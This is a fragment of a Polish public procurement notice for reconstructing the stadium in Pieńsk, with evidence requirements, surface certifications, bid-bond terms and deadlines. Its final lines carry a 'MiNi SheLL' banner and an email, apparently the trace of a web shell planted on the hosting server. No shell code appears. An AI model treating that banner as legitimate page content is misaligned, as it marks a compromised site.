do udziału w postępowaniu, albo<br/>oświadczeniaoprzynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjamipotwierdzającymiprzygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do<br/>udziału wpostępowaniuniezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej3)<br/>Wprzypadkuwykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów na<br/>zasadachokreślonych wart. 118 ustawy, Zamawiający żąda przedstawienia w odniesieniu do tych<br/>podmiotówdokumentwymieniony w pkt IX.4.1).4) Zamawiający żąda od wykonawcy<br/>przedstawieniadokumentówwymienionych w pkt IX.4.1),dotyczących podwykonawcy, któremu<br/>zamierza powierzyćwykonanieczęści zamówienia, a który nie jest podmiotem, na którego zdolnościach<br/>lub sytuacjiwykonawca polegana zasadach określonych w art. 118 ustawy.5) W przypadku<br/>wykonawcówubiegających się wspólnie oudzielenie zamówienia, dokumenty wymienione w pkt. IX.4.1)<br/>winiendołączyć każdy podmiotwystępujący wspólnie. Dokument winien być potwierdzony za zgodność<br/>zoryginałem i złożony wformie elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistymzgodnie z § 14 ust. 3Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020r. wsprawiepodmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich możeżądaćzamawiający od wykonawcy.6) Jeżeli wykonawca ma siedzibę lub<br/>miejsce zamieszkaniapozaterytorium Rzeczpospolitej Polskiej,zamiast dokumentów, o których mowa w<br/>pkt IX.4.1)składadokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub<br/>miejscezamieszkania,potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości, jegoaktywami niezarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego<br/>działalnośćgospodarcza nie jest zawieszona ani nie znajduje się on winnej tego rodzaju sytuacji<br/>wynikającej z podobnej proceduryprzewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>Dokumenty powinnybyć wystawione niewcześniej niż 3 miesięcy przed upływem terminu składania<br/>ofert.7) Jeżeli w kraju, wktórym wykonawcama siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, którejdokument dotyczy,nie wydaje się dokumentów, o których mowa w pkt<br/>IX.4. ppkt.5, zastępuje się jeodpowiednio w całości lub w części dokumentem zawierającym<br/>odpowiednio oświadczeniewykonawcy, ze wskazaniemosoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenieosoby, której dokument miałdotyczyć, złożone pod przysięgą, lub, jeżeli<br/>w kraju, w którym wykonawcama siedzibę lub miejscezamieszkania nie ma przepisów o oświadczeniu<br/>pod przysięgą, złożone przedorganem sądowym lubadministracyjnym, notariuszem, organem<br/>samorządu zawodowego lubgospodarczego, właściwym zewzględu na siedzibę lub miejsce<br/>zamieszkania wykonawcy. Dokumentypowinny być wystawione niewcześniej niż 3 miesięcy przed<br/>upływem terminu składania ofert.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Dokument potwierdzający, że wykonawca jest ubezpieczony<br/>ododpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówieniana sumę gwarancyjną nie mniejszą niż 3 000 000,00 zł (słownie złotych: trzy miliony 00/100).2)Wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5lat, a jeżeli<br/>okresprowadzenia działalności jest krótszy w tym okresie, wraz z podaniem ich rodzaju, wartości, daty<br/>imiejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniemdowodów określających,czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami,októrych mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz<br/>któregoroboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie<br/>jestwstanie uzyskać tych dokumentów – inne odpowiednie dokumenty. 3) Wykazu osób,<br/>skierowanychprzez wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych zaświadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami natemat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych dowykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności orazinformacją o podstawie do dysponowania tymi osobami.4) Dokumentów dotyczących<br/>podmiotutrzeciego, w celu wykazania spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby,warunków udziału w postępowaniu jeżeli wykonawca polega na zasobach podmiotu<br/>trzeciego.Jeżeli zuzasadnionej przyczyny wykonawca nie może złożyć wymaganych przez<br/>zamawiającegopodmiotowych środków dowodowych, wykonawca składa inne podmiotowe środki<br/>dowodowe, które wwystarczający sposób potwierdzają spełnianie opisanego przez zamawiającego<br/>warunku udziału wpostępowaniu lub kryterium selekcji dotyczącego sytuacji ekonomicznej lub<br/>finansowej. 5) Powyższedokumenty należy złożyć w formie elektronicznej lub w postaci elektronicznej<br/>opatrzonej podpisemzaufanym, lub podpisem osobistym. Dopuszcza się również przedłożenie<br/>elektronicznej kopiidokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj.<br/>podpisanej kwalifikowanympodpisem elektronicznym osoby posiadającej uprawnienia notariusza.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dokumenty potwierdzające parametry techniczne nawierzchni typu SANDWICH, które do oferty musi przedstawić wykonawca:<br/>a. Aktualny certyfikat WA (IAAF) "Product Certificate" dla oferowanej nawierzchni<br/> o wymaganej grubości na bieżnię.<br/>b. Badania potwierdzające zgodność parametrów technicznych proponowanej<br/>nawierzchni z wymaganiami stawianymi przez WA (dawniej IAAF). Badania muszą być<br/>wykonane przez laboratorium sportowe posiadające akredytację WA (IAAF). Badania te,<br/>potwierdzające zgodność parametrów technicznych proponowanej nawierzchni z wymaganiami stawianymi przez WA (IAAF) muszą być dokumentem, na podstawie którego wydano certyfikat produktowy WA (IAAF) (wymieniony w ppkt. a. – Product Certifikcate dla tej nawierzchni.<br/>c. Atest Państwowego Zakładu Higieny lub równoważnej instytucji z państwa<br/>członkowskiego Unii Europejskiej/EFTA.<br/>d. Autoryzacja producenta oferowanej nawierzchni sportowej wydana wykonawcy i<br/>dotycząca przedmiotowego zadania wraz z potwierdzeniem gwarancji.<br/>e. Próbkę oferowanej nawierzchni z oryginalną metryką producenta.<br/>f. Kartę techniczną oferowanego systemu poliuretanowego.<br/>g. Kartę techniczną granulatów SBR oraz EPDM, które będą elementem systemu<br/>nawierzchni syntetycznej bieżni. Karta techniczna musi pokazywać minimum poniższe<br/>parametry techniczne dla obydwóch rodzajów granulatów:<br/>- frakcję granulatu,<br/>- ciężar właściwy,<br/>- gęstość nasypowa,<br/>- wytrzymałość na rozciąganie,<br/>- wydłużenie w chwili zerwania,<br/>- zawartość kauczuku,<br/>- trwałość koloru,<br/>- analiza sitowa. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Wypełniony f o r m u l a r z o f e r t y – załącznik do siwz2) Wykonawca dołącza do ofertyoświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w<br/>postępowaniuwzakresie wskazanym w SWZ. Oświadczenie to stanowi dowód potwierdzający<br/>brakpodstawwykluczenia oraz spełnianie warunków udziału w postępowaniu, na dzień<br/>składaniaofert,tymczasowo zastępujący wymagane podmiotowe środki dowodowe, wskazane<br/>wSWZ.3)Oryginał pełnomocnictwa do działania w imieniu wykonawcy lub notarialnie<br/>potwierdzonyodpispełnomocnictwa, w przypadku, gdy wykonawcę reprezentuje Pełnomocnik o<br/>ile prawodopodpisania oferty nie wynika z dokumentów, do których Zamawiający ma dostęp<br/>bądź zinnychdokumentów dołączonych do oferty. Treść pełnomocnictwa musi<br/>jednoznacznieokreślaćczynności, co do wykonywania których pełnomocnik jest upoważniony. 4)<br/>Dowódwniesienia w ad i u m z dopiskiem zawierającym oznaczenie postępowania oraz z<br/>określeniemsposobu zwrotuwadium;5) Pisemne zobowiązanie innych podmiotów do oddania<br/>wykonawcy dodyspozycjiniezbędnych zasobów na potrzeby wykonania zamówienia - jeżeli<br/>wykonawca,zgodnie z art.125 ust. 5 ustawy, polega na zdolnościach lub sytuacji innych<br/>podmiotów, niezależnie odcharakteru prawnego łączących go z nimi stosunków, o czym mowa w<br/>punktachIX.6.1) – 7).6)W przypadku wykonawców ubiegających się wspólnie o udzielenie<br/>zamówieniawykonawcyzobowiązani są do ustanowienia pełnomocnika. Dokument<br/>pełnomocnictwa, zktórego treścibędzie wynikało umocowanie do reprezentowania w postępowaniu o udzieleniezamówienia tychwykonawców należy załączyć do<br/>oferty.Pełnomocnictwo powinno byćzałączone do oferty ipowinno zawierać w szczególności<br/>wskazanie:- postępowania ozamówienie publiczne, któregodotyczy,- wszystkich wykonawców<br/>ubiegających się wspólnie oudzielenie zamówieniawymienionych z nazwy z określeniem adresu<br/>siedziby,- ustanowionegopełnomocnika orazzakresu jego umocowania. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> WYMAGANIA DOTYCZĄCE WADIUM<br/> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w kwocie: 30 000,00 zł (słownie złotych: trzydzieści tysięcy 00/100).<br/> 2. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp.<br/> 3. Wadium musi obejmować pełen okres związania ofertą.<br/> 4. Wadium musi być wniesione przed upływem terminu składania ofert.<br/> Wadium wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy: Bank Spółdzielczy w Pieńsku 60 8382 0001 0000 0202 2000 0060, z oznaczeniem: tryb podstawowy na zadanie pn: „Przebudowa stadionu miejskiego w Pieńsku etap-I”. Wadium musi być na koncie Zamawiającego przed upływem terminu składania ofert.<br/> 5. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale postaci dokumentu elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać następujące elementy:<br/> 1) nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym <br/>w gwarancji lub poręczeniu musi być Gmina Pieńsk,<br/> 2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/> 3) kwotę gwarancji/poręczenia,<br/> 4) termin ważności gwarancji/poręczenia,<br/> 5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/> 6) W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/> 7) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/> 8) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w<br/>takimprzypadkuwykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu<br/>oudzieleniezamówienia albo reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawiezamówieniapublicznego. Do oferty należy załączyć pełnomocnictwo podpisane<br/>przezupoważnionychprzedstawicieli wszystkich pozostałych wykonawców w formie oryginału lub<br/>kopiipoświadczonejza zgodność z oryginałem przez notariusza. Złożona oferta musi być<br/>podpisana wtaki sposób,by prawnie zobowiązywała wszystkich wykonawców występujących<br/>wspólnie.Pełnomocnictwoskłada się w oryginale lub kopii poświadczonej notarialnie.2. W<br/>odniesieniu do wymagańpostawionych przez Zamawiającego, każdy z wykonawców<br/>występujących wspólniemusiudokumentować, że nie podlega wykluczeniu na podstawie art. 108<br/>ust. 1 i 2 oraz 109 ust.1pkt.4,5,7-10 ustawy. Warunki udziału w postępowaniu określone w art. 112 ust. 2 pkt 2-3ustawyPZP (pkt VII SIWZ) musi spełniać co najmniej jeden wykonawca<br/>samodzielnie lubwszyscywykonawcy łącznie. 3. Wszelka korespondencja oraz rozliczenia<br/>dokonywane będąwyłącznie zpełnomocnikiem.4. Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówieniapublicznegoponoszą solidarną odpowiedzialność za wykonanie umowy<br/>oraz za szkody powstałez tytułuczynów niedozwolonych.5. Jeżeli oferta Wykonawców wspólnie<br/>ubiegających się oudzieleniezamówienia, zostanie wybrana jako najkorzystniejsza, Zamawiający<br/>zobowiązujewykonawcówprzed zawarciem umowy w sprawie zamówienia publicznego, do<br/>przedłożeniaumowyregulującej współpracę tych podmiotów. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami §14. 1 projektu umowy który stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-16 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia,zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP https://epuap.gov.pl/wps/portal iudostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-16 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> nie dotyczy</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com